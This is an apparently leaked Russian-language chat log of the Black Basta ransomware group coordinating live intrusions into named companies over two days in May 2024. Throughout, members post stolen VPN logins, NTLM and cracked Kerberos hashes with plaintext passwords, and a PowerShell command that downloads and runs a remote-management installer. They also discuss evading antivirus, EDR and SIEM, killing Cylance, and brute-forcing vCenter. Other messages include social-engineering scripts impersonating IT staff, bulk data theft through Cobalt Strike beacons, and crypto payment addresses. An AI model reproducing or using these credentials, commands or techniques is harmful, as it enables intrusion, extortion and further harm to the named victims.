2024-05-07 19:51:15
@nickolas:talks.icu
вы идете или нет ?
2024-05-07 19:51:56
@nickolas:talks.icu
image.png
2024-05-07 19:51:56
@nickolas:talks.icu
аваст и сентик
2024-05-07 19:57:07
Black Basta
++
2024-05-07 19:57:15
Black Basta
```
2024-05-07 19:57:22
Black Basta
image.png
2024-05-07 19:57:27
Black Basta
image.png
2024-05-07 19:57:32
Black Basta
image.png
2024-05-07 19:57:50
Black Basta
Тут локальный админ
2024-05-07 19:58:09
@usernamejj:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> ```
2024-05-07 19:59:04
@usernamess:matrix.bestflowers247.online
ебаный рот
2024-05-07 19:59:13
Black Basta
))
2024-05-07 19:59:13
@usernamess:matrix.bestflowers247.online
почему сразу весь пак нельзя сделать
2024-05-07 19:59:15
@usernamess:matrix.bestflowers247.online
и пинг
2024-05-07 19:59:21
Black Basta
чего ?
2024-05-07 19:59:24
@usernamess:matrix.bestflowers247.online
и фтп и вебдав
2024-05-07 19:59:34
Black Basta
он ушел ?
2024-05-07 19:59:53
@usernamess:matrix.bestflowers247.online
это должно быть готово сразу как сервак дали
2024-05-07 19:59:58
Black Basta
> <@usernamess:matrix.bestflowers247.online> и фтп и вебдав
2024-05-07 20:00:00
@usernamess:matrix.bestflowers247.online
а не дергать его из постели
2024-05-07 20:00:10
@usernamess:matrix.bestflowers247.online
пинг
2024-05-07 20:00:12
@usernamess:matrix.bestflowers247.online
нужен
2024-05-07 20:00:37
Black Basta
сейчас
2024-05-07 20:01:17
Black Basta
___
2024-05-07 20:01:19
Black Basta
https://cag.caeuk.com/logon/LogonPoint/tmindex.html:miller.james:Spring2024!
2024-05-07 20:01:25
Black Basta
тут 2фа надо самим поставить
2024-05-07 20:01:28
Black Basta
_____
2024-05-07 20:03:37
Black Basta
знаешь как через cmd открыть PowerShell ?
2024-05-07 20:03:57
Black Basta
`$env:LEVEL_API_KEY = "h8iiWUeJLyUz8S9hrauaaJcH"; Set-ExecutionPolicy RemoteSigned -Scope Process -Force; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -useb https://downloads.level.io/install_windows.ps1 | iex`
2024-05-07 20:04:04
Black Basta
мой rmm туда добавь еще
2024-05-07 20:04:18
Black Basta
аваст и сентик
2024-05-07 20:04:31
@nickolas:talks.icu
упала тачка ((((
2024-05-07 20:04:33
@nickolas:talks.icu
пздц
2024-05-07 20:04:39
@usernamejj:matrix.bestflowers247.online
socks будто сразу не работает
2024-05-07 20:04:40
Black Basta
из-за чего ?
2024-05-07 20:04:48
Black Basta
я ничего не сделал
2024-05-07 20:04:52
Black Basta
да
2024-05-07 20:04:54
Black Basta
упала тачка
2024-05-07 20:04:58
Black Basta
хуйня какая то
2024-05-07 20:05:00
Black Basta
хуйня какая то
2024-05-07 20:05:05
Black Basta
что то сломалось там
2024-05-07 20:05:09
Black Basta
100%
2024-05-07 20:05:14
Black Basta
палится что то
2024-05-07 20:05:35
@nickolas:talks.icu
палится социалка
2024-05-07 20:05:43
@nickolas:talks.icu
они потом созваниваются
2024-05-07 20:05:49
@nickolas:talks.icu
в этом трабл основной пока я вижу
2024-05-07 20:05:55
@nickolas:talks.icu
будем завтра подгонять техник
2024-05-07 20:06:42
Black Basta
++
2024-05-07 20:07:43
@nickolas:talks.icu
```
2024-05-07 20:07:46
@nickolas:talks.icu
дальше
2024-05-07 20:07:56
Black Basta
```
2024-05-07 20:08:00
Black Basta
дальше
2024-05-07 20:08:05
@nickolas:talks.icu
* ```
2024-05-07 20:08:17
Black Basta
сокса нету
2024-05-07 20:08:27
Black Basta
195.123.233.55
2024-05-07 20:08:34
Black Basta
увидел
2024-05-07 20:08:43
Black Basta
скрины
2024-05-07 20:09:22
@nickolas:talks.icu
image.png
2024-05-07 20:09:48
@nickolas:talks.icu
image.png
2024-05-07 20:10:56
@usernameyy:matrix.bestflowers247.online
либо пинг, либо всё остальное, взаимоисключающие софты
2024-05-07 20:11:06
@usernameyy:matrix.bestflowers247.online
для пинга перехват трафика используется, всё остальное отключается
2024-05-07 20:11:19
@nickolas:talks.icu
скинул
2024-05-07 20:11:42
Black Basta
image.png
2024-05-07 20:11:47
Black Basta
image.png
2024-05-07 20:12:13
Black Basta
> <@usernameyy:matrix.bestflowers247.online> либо пинг, либо всё остальное, взаимоисключающие софты
2024-05-07 20:12:21
Black Basta
тут Сетки летят
2024-05-07 20:26:42
@usernamemm:matrix.bestflowers247.online
`9993cb32a221508c66b1db4418d7fec1`
2024-05-07 20:27:59
@username777:matrix.bestflowers247.online
9993cb32a221508c66b1db4418d7fec1:itdept@2023
2024-05-07 20:28:04
@usernamemm:matrix.bestflowers247.online
++
2024-05-07 20:29:36
@usernamemm:matrix.bestflowers247.online
`855b0112762aed311ec3094220a2be94`
2024-05-07 20:31:07
@usernamemm:matrix.bestflowers247.online
`f25f51db972365e2fc7b69dd30cd8ff8`
2024-05-07 20:35:06
@usernamejj:matrix.bestflowers247.online
rub.txt
2024-05-07 20:35:29
@username777:matrix.bestflowers247.online
$krb5tgs$23$*SQL14Admin$SSC.SAVAGESERVICES.COM$SSC.SavageServices.com/SQL14Admin*$d75a1
2024-05-07 20:35:39
@usernamejj:matrix.bestflowers247.online
> <@username777:matrix.bestflowers247.online> $krb5tgs$23$*SQL14Admin$SSC.SAVAGESERVICES.COM$SSC.SavageServices.com/SQL14Admin*$d75a1
2024-05-07 20:36:07
@nickolas:talks.icu
```
2024-05-07 20:36:17
@username777:matrix.bestflowers247.online
* $krb5tgs$23$*SQL14Admin$SSC.SAVAGESERVICES.COM$SSC.SavageServices.com/SQL14Admin*$d75a137accf0c6bd335...cbec192fea:Cr34tiv3
2024-05-07 20:36:29
Black Basta
```
2024-05-07 20:36:33
Black Basta
скрины
2024-05-07 20:37:23
@nickolas:talks.icu
image.png
2024-05-07 20:37:46
Black Basta
image.png
2024-05-07 20:38:04
@usernameww:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> ```
2024-05-07 20:38:10
@nickolas:talks.icu
image.png
2024-05-07 20:38:47
Black Basta
image.png
2024-05-07 20:40:32
@usernamejj:matrix.bestflowers247.online
> <@usernamejj:matrix.bestflowers247.online> sent a file.
2024-05-07 20:40:53
Black Basta
почему стоп ?
2024-05-07 20:42:19
@usernamejj:matrix.bestflowers247.online
сокс перестал работать
2024-05-07 20:43:42
Black Basta
> <@nickolas:talks.icu> ```
2024-05-07 20:43:56
Black Basta
успел уйти куда то ?
2024-05-07 20:44:18
@usernamejj:matrix.bestflowers247.online
я только кербы запросить успел
2024-05-07 20:44:30
Black Basta
проверь
2024-05-07 20:44:33
Black Basta
срочно
2024-05-07 20:44:54
@nickolas:talks.icu
упал бот...
2024-05-07 20:44:58
@nickolas:talks.icu
блять что же такое
2024-05-07 20:45:06
@nickolas:talks.icu
что ты успел сделать ?
2024-05-07 20:45:07
Black Basta
я тебе говорю
2024-05-07 20:45:12
Black Basta
что то не то происходит
2024-05-07 20:45:16
Black Basta
как ты поднимаешь сокс ?
2024-05-07 20:45:24
@usernamenn:matrix.bestflowers247.online
долго дату качает?
2024-05-07 20:45:44
@nickolas:talks.icu
через 443 идет коннект на ип
2024-05-07 20:46:03
@nickolas:talks.icu
там все стартует, любой ав, нет проблем на запуске, ну вообще никаких
2024-05-07 20:47:40
Black Basta
как только трафик начинает идти по соксу ав его могут рубить
2024-05-07 20:47:41
@usernameboy:matrix.bestflowers247.online
855b0112762aed311ec3094220a2be94:J@N3t22!
2024-05-07 20:47:49
Black Basta
вот может быть в чем проблема
2024-05-07 20:48:06
@nickolas:talks.icu
Ав скорее всего не видят этот трафик
2024-05-07 20:48:15
Black Basta
EDR
2024-05-07 20:48:22
@nickolas:talks.icu
и едр не видит
2024-05-07 20:48:30
@nickolas:talks.icu
ISP / SIEM внтури могут такое видеть
2024-05-07 20:48:39
@nickolas:talks.icu
но они не убивают мгновенно, это инструменты аналитики
2024-05-07 20:49:09
@nickolas:talks.icu
в те конторы, в которые мы щас заходим, там точно есть и SIEM и ISP
2024-05-07 20:49:13
Black Basta
av и edr тоже видят
2024-05-07 20:49:24
@nickolas:talks.icu
не не не, едр мы обходим
2024-05-07 20:49:31
Black Basta
боты живые ?
2024-05-07 20:49:34
Black Basta
у тебя есть rmm
2024-05-07 20:49:45
@nickolas:talks.icu
да боты умирают, шухер = изоляция компа от сети
2024-05-07 20:49:47
Black Basta
смотри
2024-05-07 20:49:50
Black Basta
объясню
2024-05-07 20:49:56
Black Basta
мы всегда понимаем соксы
2024-05-07 20:49:59
@nickolas:talks.icu
Hi, Sue, it's Charles from IT security here. And really, from Security, I know that there's a lot going on right now, but we quarantined your device following an incident earlier today. So your laptop is currently disconnected from all of Haynes services. And I believe based on the telemetry, I'm seeing that you've switched over to your cell phone. And I was just looking to get a little information from you to clarify and make sure that that's correct. Feel free to reach out to me on teams. You can also contact my direct manager, Doug Staubach. Reach out to anybody you need to verify that I'm real and once you're comfortable let me know. I just need to get some info from your phone so that I can make sure that you really have switched to your phone and that your account has not been compromised. But thank you so much. Much appreciated and hopefully I'll talk to you soon. Bye.
2024-05-07 20:50:07
@nickolas:talks.icu
я читаю их переписки, я вижу как команды реагируют
2024-05-07 20:50:11
Black Basta
он приходит
2024-05-07 20:50:18
@nickolas:talks.icu
проблема не в едр, проблема в другом элементе
2024-05-07 20:50:22
Black Basta
ты даже куда то подключается
2024-05-07 20:50:33
Black Basta
но как только чуть больше обычного идет нагрузка
2024-05-07 20:50:36
Black Basta
сокс отваливается
2024-05-07 20:51:38
@nickolas:talks.icu
скорее всего проблема не в нагрузке сокса, а в чем то другом 🙄
2024-05-07 20:52:12
@nickolas:talks.icu
Они мониторят ИПС \ СИЕМ, видят, что начались походы на дц, и начинается движуха
2024-05-07 20:52:15
Black Basta
Hi, Sue, it's Charles from IT security here. And really, from Security, I know that there's a lot going on right now, but we quarantined your device following an incident earlier today. So your laptop is currently disconnected from all of Haynes services. And I believe based on the telemetry, I'm seeing that you've switched over to your cell phone. And I was just looking to get a little information from you to clarify and make sure that that's correct. Feel free to reach out to me on teams. You can also contact my direct manager, Doug Staubach. Reach out to anybody you need to verify that I'm real and once you're comfortable let me know. I just need to get some info from your phone so that I can make sure that you really have switched to your phone and that your account has not been compromised. But thank you so much. Much appreciated and hopefully I'll talk to you soon. Bye.
2024-05-07 20:52:30
@nickolas:talks.icu
Там видишь уже в ярдниках что то типа внутренного SOC есть
2024-05-07 20:52:33
Black Basta
дело не в нагрузке на сокс даже а дело в чем то другом
2024-05-07 20:52:42
Black Basta
вот переписка их Haynes
2024-05-07 20:53:08
@usernamemm:matrix.bestflowers247.online
++
2024-05-07 20:53:47
Black Basta
ISP / SIEM внтури могут такое видеть
2024-05-07 20:53:55
@nickolas:talks.icu
Плюс вероятность того, что пользователь когда поговорил с нами, захочет связаться с хелпдеском и уточнить все ли окей, реально ли все окей, тут тоже узкое горлышко
2024-05-07 20:54:21
@nickolas:talks.icu
Видимо мы еще взяли высокое ревеню, что тоже плохо
2024-05-07 20:55:19
Black Basta
Они мониторят ISP / SIEM, видят, что начались походы на DC, и начинается движуха, возможно в это я думаю. ни AV ни EDR не видят трафика сокса.
2024-05-07 20:55:43
Black Basta
нормлаьный ревеню
2024-05-07 20:55:45
@nickolas:talks.icu
понимаешь, не только коннект же рубится, еще и креды убиваются, а это значит происходит блокировка учетной записи, это делает скорее всего уже админ, так как у едр нет такой глубокой интеграции в ад
2024-05-07 20:55:49
Black Basta
соксы почему откисают блять
2024-05-07 20:56:00
Black Basta
может мои поднимать
2024-05-07 20:56:14
@nickolas:talks.icu
Проблема не в соксе, проблема в том, что тачку изолируют
2024-05-07 20:56:20
Black Basta
ты rmm же сейчас тавишь вначале
2024-05-07 20:56:38
Black Basta
проблема в том, что тачку изолируют
2024-05-07 20:56:39
@nickolas:talks.icu
рмм ставится где только есть локальный админ
2024-05-07 20:56:54
@nickolas:talks.icu
а так у нас есть закрепчик, но там все прозрачно, сокс подняли, цмд подняли, все.
2024-05-07 20:57:06
@nickolas:talks.icu
я пологаю знаю, где кроется проблема
2024-05-07 20:57:34
@nickolas:talks.icu
и она как раз лежит в плоскости СИ
2024-05-07 20:57:57
Black Basta
> <@nickolas:talks.icu> рмм ставится где только есть локальный админ
2024-05-07 20:58:40
@nickolas:talks.icu
да есть у нас которые работают от юзера, но это так себе история
2024-05-07 20:58:53
@nickolas:talks.icu
ты про левел.ио ?
2024-05-07 20:59:50
@usernameww:matrix.bestflowers247.online
kerb.txt
2024-05-07 21:00:08
@manager880:colorado.su
85
2024-05-07 21:00:19
@manager880:colorado.su
0x08Df289E0e3b54064B3eF2d5ba6924F04DF6aEA4
2024-05-07 21:00:24
@manager880:colorado.su
* 84
2024-05-07 21:00:56
@manager880:colorado.su
49.5
2024-05-07 21:01:01
@manager880:colorado.su
0xdcb10300e7fc51d19c38b3254770f1d1a7448878
2024-05-07 21:01:08
@nickolas:talks.icu
ПОДНЯЛСЯ СОКС!
2024-05-07 21:01:22
Black Basta
ПОДНЯЛСЯ СОКС!
2024-05-07 21:01:30
@nickolas:talks.icu
> <@nickolas:talks.icu> ```
2024-05-07 21:01:41
@usernamejj:matrix.bestflowers247.online
++
2024-05-07 21:01:46
Black Basta
> <@nickolas:talks.icu> ты про левел.ио ?
2024-05-07 21:01:54
Black Basta
savageco.com
2024-05-07 21:02:06
Black Basta
> <@nickolas:talks.icu> ЗДЕСЬ ПОДНЯЛСЯ
2024-05-07 21:02:19
@nickolas:talks.icu
ну я коннект вижу
2024-05-07 21:02:20
@nickolas:talks.icu
чекни
2024-05-07 21:02:41
Black Basta
рабоетат ?
2024-05-07 21:02:48
Black Basta
* работает ?
2024-05-07 21:02:52
@usernamejj:matrix.bestflowers247.online
да, подключается
2024-05-07 21:02:58
Black Basta
да, подключается
2024-05-07 21:03:00
Black Basta
++
2024-05-07 21:03:02
Black Basta
++
2024-05-07 21:03:33
@nickolas:talks.icu
спрыгивайте как можно скорее.
2024-05-07 21:03:41
@nickolas:talks.icu
ладно, переориентируемся
2024-05-07 21:03:45
@nickolas:talks.icu
придумаем че то
2024-05-07 21:04:10
Black Basta
ок
2024-05-07 21:04:19
@usernamecc:matrix.bestflowers247.online
> <@usernamenn:matrix.bestflowers247.online> долго дату качает?
2024-05-07 21:05:03
@usernamenn:matrix.bestflowers247.online
понял, наращиваешь обороты или все поставил и ебашит?
2024-05-07 21:05:18
@usernamenn:matrix.bestflowers247.online
скорость нужно увеличивать если есть маза
2024-05-07 21:06:08
@usernamenn:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> Они мониторят ISP / SIEM, видят, что начались походы на DC, и начинается движуха, возможно в это я думаю. ни AV ни EDR не видят трафика сокса.
2024-05-07 21:06:25
@usernamenn:matrix.bestflowers247.online
причем капитальная
2024-05-07 21:09:37
@usernamejj:matrix.bestflowers247.online
kerb_hash.txt
2024-05-07 21:10:59
@manager880:colorado.su
✅
2024-05-07 21:11:02
@manager880:colorado.su
thank you
2024-05-07 21:11:04
@manager880:colorado.su
ttyt
2024-05-07 21:13:30
@manager880:colorado.su
✅
2024-05-07 21:13:33
@manager880:colorado.su
спасибо
2024-05-07 21:14:12
@iamnurnazarov:matrix.org
принял, спасибо
2024-05-07 21:14:16
@iamnurnazarov:matrix.org
до завтра
2024-05-07 21:18:49
Black Basta
> <@nickolas:talks.icu> Они мониторят ИПС \ СИЕМ, видят, что начались походы на дц, и начинается движуха
2024-05-07 21:28:24
@arslanshabbirmalik:matrix.org
Thank you sir. You too have a great evening.
2024-05-07 21:28:27
@arslanshabbirmalik:matrix.org
🫡
2024-05-07 21:41:58
@nickolas:talks.icu
да вот капец
2024-05-07 21:42:09
@nickolas:talks.icu
как правильно выстроить работу, и не наводить шухера
2024-05-07 21:42:40
@nickolas:talks.icu
крутанулся на тргете ?
2024-05-07 21:43:09
@nickolas:talks.icu
вот субару висит, и им похеру
2024-05-07 22:01:59
@nickolas:talks.icu
у меня кейтроник приват так и не появился (
2024-05-07 22:26:54
@usernamejj:matrix.bestflowers247.online
снова перестал работать
2024-05-08 03:55:24
@usernamecc:matrix.bestflowers247.online
---
2024-05-08 03:56:37
@usernamecc:matrix.bestflowers247.online
6:55msk = 900gb, один бикон отъебнул (DW3-cob23DNS)- перепоставил эти ссылки еще раз качать в другие биконы где не так много нагрузки.
2024-05-08 05:27:21
@usernamehunter:matrix.bestflowers247.online
> <@usernamejj:matrix.bestflowers247.online> sent a file.
2024-05-08 05:42:47
@usernameww:matrix.bestflowers247.online
```
2024-05-08 05:42:57
@usernameww:matrix.bestflowers247.online
```
2024-05-08 05:43:08
@usernameww:matrix.bestflowers247.online
```
2024-05-08 05:50:52
@usernamess:matrix.bestflowers247.online
```
2024-05-08 05:51:26
@usernamess:matrix.bestflowers247.online
* ```
2024-05-08 05:55:26
@usernamenn:matrix.bestflowers247.online
Привет
2024-05-08 05:55:48
@usernamenn:matrix.bestflowers247.online
lockbit_indictment.pdf
2024-05-08 05:56:15
@usernamenn:matrix.bestflowers247.online
DS_2016_4_outfile.xls
2024-05-08 05:56:15
@usernamenn:matrix.bestflowers247.online
DS_2016_outfile.xls
2024-05-08 05:56:17
@usernamenn:matrix.bestflowers247.online
DS_2016_2_outfile.xls
2024-05-08 05:56:18
@usernamenn:matrix.bestflowers247.online
DS_2016_3_outfile.xls
2024-05-08 05:56:47
@usernamenn:matrix.bestflowers247.online
DS_2k8_2k12_outfile.xls
2024-05-08 05:57:16
@usernamenn:matrix.bestflowers247.online
Юзерские поставлю на скан
2024-05-08 05:57:25
@usernamess:matrix.bestflowers247.online
я ставил
2024-05-08 05:57:28
@usernamess:matrix.bestflowers247.online
там везде
2024-05-08 05:57:34
@usernamenn:matrix.bestflowers247.online
DS?
2024-05-08 05:57:39
@usernamess:matrix.bestflowers247.online
ой не
2024-05-08 05:57:40
@usernamess:matrix.bestflowers247.online
)
2024-05-08 05:57:43
@usernamess:matrix.bestflowers247.online
ставь
2024-05-08 05:57:51
@usernamenn:matrix.bestflowers247.online
просто DS юзерских там дохуя
2024-05-08 05:57:55
@usernamenn:matrix.bestflowers247.online
ща займусь
2024-05-08 06:09:01
@usernamess:matrix.bestflowers247.online
2024-05-08 06:10:21
@usernamess:matrix.bestflowers247.online
```
2024-05-08 06:10:33
@usernamejj:matrix.bestflowers247.online
> <@usernamehunter:matrix.bestflowers247.online> $krb5tgs$23$*dallashartle$SSC.SAVAGESERVICES.COM$SSC.SavageServices.com/dallashartle*$fb940484267ac......eaed1781243b:WarningTrack10
2024-05-08 06:12:30
@usernamenn:matrix.bestflowers247.online
Время попробовать киллер Cylance
2024-05-08 06:17:49
@usernamenn:matrix.bestflowers247.online
Поставлю сканить MIKAL юзерские, DS сканить на процессы смысла нет там уверенно думаю уже накатили на все что можно Cylance
2024-05-08 06:27:51
@nickolas:talks.icu
привет! у меня так и не добавился кейтроник приват.
2024-05-08 06:28:43
@usernamess:matrix.bestflowers247.online
`DS\srezzo-ds aXkS83H(EhPT`
2024-05-08 06:30:11
@usernamess:matrix.bestflowers247.online
`ds\cphopf aXkS83H(EhPT`
2024-05-08 06:32:21
@usernamess:matrix.bestflowers247.online
`ds\skrie013-ds aXkS83H(EhPT`
2024-05-08 06:34:42
@usernamess:matrix.bestflowers247.online
`lwest030-ds aXkS83H(EhPT`
2024-05-08 06:47:35
Black Basta
доброе
2024-05-08 06:49:48
Black Basta
я увидел да
2024-05-08 06:59:49
Black Basta
ласт просит прямо линк на фаил который ставить
2024-05-08 06:59:51
Black Basta
я найти не могу
2024-05-08 07:00:11
Black Basta
сейчас медиков ставят
2024-05-08 07:00:17
Black Basta
там админы спалили ?
2024-05-08 07:00:20
@usernamenn:matrix.bestflowers247.online
да я вкурсе
2024-05-08 07:00:46
@usernamenn:matrix.bestflowers247.online
да админы подняли кипишь
2024-05-08 07:01:00
@usernamenn:matrix.bestflowers247.online
я щас юзерские сканю в другом трасте на процессы
2024-05-08 07:01:10
@usernamenn:matrix.bestflowers247.online
с них еще дату надо доставлять качать пробовать если будут без силанса
2024-05-08 07:01:19
Black Basta
++
2024-05-08 07:01:22
Black Basta
хорошо
2024-05-08 07:01:34
Black Basta
думаешь из-за чего они спалили ?
2024-05-08 07:02:02
@usernamenn:matrix.bestflowers247.online
пока не понятно
2024-05-08 07:06:20
@usernamett:matrix.bestflowers247.online
`185.219.221.136:40197 ALBIR DS`
2024-05-08 07:11:43
Black Basta
ты хочешь сейчас дотянуть юзерские и с них езе доставим выкачку ?
2024-05-08 07:18:01
@usernamemm:matrix.bestflowers247.online
`10.175.35.231`
2024-05-08 07:28:42
@usernamett:matrix.bestflowers247.online
```
2024-05-08 07:33:56
@usernameyy:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> Hello!
2024-05-08 07:34:09
@usernameyy:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> что бы просто вставил в cmd или pw и все
2024-05-08 07:34:43
@usernameyy:matrix.bestflowers247.online
что то написать хотел, пока перечитывал твои сообщения - забыл, пипец
2024-05-08 07:35:17
Black Basta
> <@usernameyy:matrix.bestflowers247.online> окончательный вариант?
2024-05-08 07:35:34
Black Basta
> <@usernameyy:matrix.bestflowers247.online> могу так сделать, но паверпик же лучше не?
2024-05-08 07:35:36
@usernameyy:matrix.bestflowers247.online
сегодня его закинуть в локер или после вых?
2024-05-08 07:35:50
@usernameyy:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> хочу что бы у нас еще была команда pw
2024-05-08 07:36:39
@usernamenn:matrix.bestflowers247.online
ага
2024-05-08 07:41:12
@usernamenn:matrix.bestflowers247.online
image.png
2024-05-08 07:41:19
@usernamenn:matrix.bestflowers247.online
processes так снял, у кого то было так?
2024-05-08 07:43:27
@usernamett:matrix.bestflowers247.online
не было
2024-05-08 07:43:49
@usernamezz:matrix.bestflowers247.online
это то что названия процессов нет?
2024-05-08 07:44:09
@usernamenn:matrix.bestflowers247.online
> <@usernamezz:matrix.bestflowers247.online> это то что названия процессов нет?
2024-05-08 07:44:16
@usernamezz:matrix.bestflowers247.online
нет, небыло
2024-05-08 07:49:51
@usernameyy:matrix.bestflowers247.online
> <@usernameyy:matrix.bestflowers247.online> ```
2024-05-08 07:52:45
@usernamenn:matrix.bestflowers247.online
`asc.internal\dodri401-asc e99ea2d1edb176220f3c7e779a9e061a`
2024-05-08 07:52:49
@usernamenn:matrix.bestflowers247.online
новые креды
2024-05-08 07:53:06
@usernamess:matrix.bestflowers247.online
надо открытые пассы
2024-05-08 07:53:09
@usernamess:matrix.bestflowers247.online
чтоб заходить
2024-05-08 07:53:15
@usernamess:matrix.bestflowers247.online
и в vc попадать
2024-05-08 07:53:41
@usernamenn:matrix.bestflowers247.online
от ASC?
2024-05-08 07:53:47
@usernamenn:matrix.bestflowers247.online
могу наменять пассы
2024-05-08 07:54:09
@usernamess:matrix.bestflowers247.online
во все трасты надо открытые
2024-05-08 07:54:18
@usernamess:matrix.bestflowers247.online
aXkS83H(EhPT
2024-05-08 07:54:20
@usernamess:matrix.bestflowers247.online
вот пасс
2024-05-08 07:56:46
@usernamenn:matrix.bestflowers247.online
какие админы админили в vcenter скрин скиньте
2024-05-08 07:56:52
@usernamenn:matrix.bestflowers247.online
в который попали
2024-05-08 07:57:00
@usernamenn:matrix.bestflowers247.online
я буду менять пассы таким же в других трастах
2024-05-08 08:02:27
@usernamett:matrix.bestflowers247.online
```
2024-05-08 08:09:07
@usernamenn:matrix.bestflowers247.online
```
2024-05-08 08:10:38
@usernameyy:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> вот тут можно добавить к полю по средине last visit:06.05.2024 22:42
2024-05-08 08:13:19
@usernamess:matrix.bestflowers247.online
image.png
2024-05-08 08:14:06
@usernamess:matrix.bestflowers247.online
image.png
2024-05-08 08:14:23
@usernamess:matrix.bestflowers247.online
А это видимо с микрософта скаченные проги кем то из админов тоже блокнулись
2024-05-08 08:15:00
Black Basta
++
2024-05-08 08:19:27
@usernamenn:matrix.bestflowers247.online
между делом
2024-05-08 08:20:05
@usernamenn:matrix.bestflowers247.online
Вечером будет готов BOF (CNA) для Upload файлов на наш FTP, так же допилится acurl что бы можно было выкачивать rclone.zip и будет анзипать по аргументу.
2024-05-08 08:21:44
@usernamenn:matrix.bestflowers247.online
```
2024-05-08 08:22:12
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> ласт просит прямо линк на фаил который ставить
2024-05-08 08:24:08
@lapa:matrix.bestflowers247.online
FortiGate-VM deployment packages are found on the Customer Service & Support site. In the Download drop-down menu, select VM Images to access the available VM deployment packages.
2024-05-08 08:24:08
Black Basta
тут с мордой дела
2024-05-08 08:24:10
Black Basta
брут
2024-05-08 08:24:15
Black Basta
там не можем набрутить
2024-05-08 08:24:15
@lapa:matrix.bestflowers247.online
походу просто так не скачаешь
2024-05-08 08:24:26
Black Basta
из-за того что они добавили в форме галочку
2024-05-08 08:25:44
@lapa:matrix.bestflowers247.online
что за галочка?
2024-05-08 08:26:20
@lapa:matrix.bestflowers247.online
я пока отойду, ноздри промывать
2024-05-08 08:26:25
@lapa:matrix.bestflowers247.online
10 мин
2024-05-08 08:30:10
Black Basta
++
2024-05-08 08:30:32
Black Basta
Снимок экрана 2024-05-08 в 11.30.20.png
2024-05-08 08:39:33
@lapa:matrix.bestflowers247.online
нужно на виртуалке поднять
2024-05-08 08:39:44
@lapa:matrix.bestflowers247.online
чтобы зашел и посмотрел
2024-05-08 08:39:49
@lapa:matrix.bestflowers247.online
* нужно на дедике поднять
2024-05-08 08:39:58
@lapa:matrix.bestflowers247.online
какой запрос с этой галочкой идет
2024-05-08 08:41:34
Black Basta
сейчас
2024-05-08 08:43:58
Black Basta
```
2024-05-08 08:44:07
Black Basta
скажу когда заходить
2024-05-08 08:45:10
@lapa:matrix.bestflowers247.online
+
2024-05-08 08:45:26
@lapa:matrix.bestflowers247.online
ну я смотрю, тут идет авторизация на https://ksman-idpa01-vc01.mrhc.via-christi.org/websso/SAML2/SSO/vSphere.local
2024-05-08 08:45:33
Black Basta
смотри
2024-05-08 08:45:39
Black Basta
заходи я открыл
2024-05-08 08:45:42
@lapa:matrix.bestflowers247.online
а домен host ksman-idpa01-vc01.mrhc.via-christi.org не резолвится
2024-05-08 08:48:21
@lapa:matrix.bestflowers247.online
никак не влияет это галочка на брут
2024-05-08 08:48:33
@lapa:matrix.bestflowers247.online
потому что в запрозах на авторизацию она вообще не передается
2024-05-08 08:49:41
Black Basta
++
2024-05-08 08:50:15
@lapa:matrix.bestflowers247.online
я пока это посмотрю
2024-05-08 08:50:17
@lapa:matrix.bestflowers247.online
10.101.66.18
2024-05-08 08:50:30
@lapa:matrix.bestflowers247.online
у него тут идет линк для авторизации через https://ksman-idpa01-vc01.mrhc.via-christi.org
2024-05-08 08:50:38
@lapa:matrix.bestflowers247.online
который не резолвится
2024-05-08 08:50:46
@lapa:matrix.bestflowers247.online
домена такого какбудто нет
2024-05-08 08:51:03
Black Basta
мы устали немного искать и брутить доступы
2024-05-08 08:51:12
Black Basta
решили без витуализации
2024-05-08 08:51:16
Black Basta
там поверх сделать все
2024-05-08 08:51:19
@usernamett:matrix.bestflowers247.online
```
2024-05-08 08:51:27
Black Basta
слишком она гиганская
2024-05-08 08:52:49
@lapa:matrix.bestflowers247.online
+
2024-05-08 08:56:30
@nickolas:talks.icu
Думаю на счет вчерашних факапов с сетями, то что мы сбее брали, +- получилось тоже самое...
2024-05-08 08:59:27
Black Basta
выключили соксы
2024-05-08 08:59:29
Black Basta
и все
2024-05-08 08:59:35
@nickolas:talks.icu
Скорее всего это комплекс факторов, и ваши дейсвтия быстро палятся, и пользователи чувствую не ладное и бегут в саппорт, и возможно где то именно сам коннект привлекает внимания.
2024-05-08 09:00:12
@nickolas:talks.icu
Так каждый раз происходит изоляция воркстанции и банят креды
2024-05-08 09:00:50
@nickolas:talks.icu
НО, когда мы выбирали компании с меньшим ревеню, реакция была куда хуже
2024-05-08 09:01:29
Black Basta
компании топ вчера было
2024-05-08 09:01:35
@nickolas:talks.icu
Вчера компании все были +-1б, у них уже Cyber Security Officer's , там целые департаменты.
2024-05-08 09:02:01
Black Basta
ты пиши я чуть позже отвечу
2024-05-08 09:02:04
Black Basta
сетку лочим
2024-05-08 09:02:11
@nickolas:talks.icu
Мы понимаем где проваливаемся по СИ, это я смогу подтянуть, но с техниками работы с ад, у нас +- ровно так же, как и у вас
2024-05-08 09:02:59
@nickolas:talks.icu
Я думаю на ближайшие дни мы просто упадем по ревеню на уровень, 200-600м, и будем подтаскивать немножко софт и методы СИ
2024-05-08 09:03:10
@usernamess:matrix.bestflowers247.online
```
2024-05-08 09:03:34
@nickolas:talks.icu
Ярдники хорошо, я вижу где мы пробиваемся, понимаю че делать нужно, но работа должна происходить немного тише, немного более лаконично.
2024-05-08 09:04:36
@nickolas:talks.icu
Я вчера пол ночи еще смотрел различные материалы по SIEM \ IDS \ IPS
2024-05-08 09:07:02
@nickolas:talks.icu
Надо ставить это все у себя, и тестировать, хотя бы продукты от некоторых топ вендоров.
2024-05-08 09:09:55
@nickolas:talks.icu
Нужно совместно думать, куда мы можем это все направлять, таргетов я любых достану, у меня с каждым днем все лучше и лучше складывается картинка, как все это можно увязывать.
2024-05-08 09:09:59
@lapa:matrix.bestflowers247.online
PULSE_VALID.txt
2024-05-08 09:10:03
@lapa:matrix.bestflowers247.online
FORTI_VALID.txt
2024-05-08 09:10:03
@lapa:matrix.bestflowers247.online
CISCO_VALID_ITEMS.txt
2024-05-08 09:10:04
@lapa:matrix.bestflowers247.online
AUTH_VALID.txt
2024-05-08 09:10:04
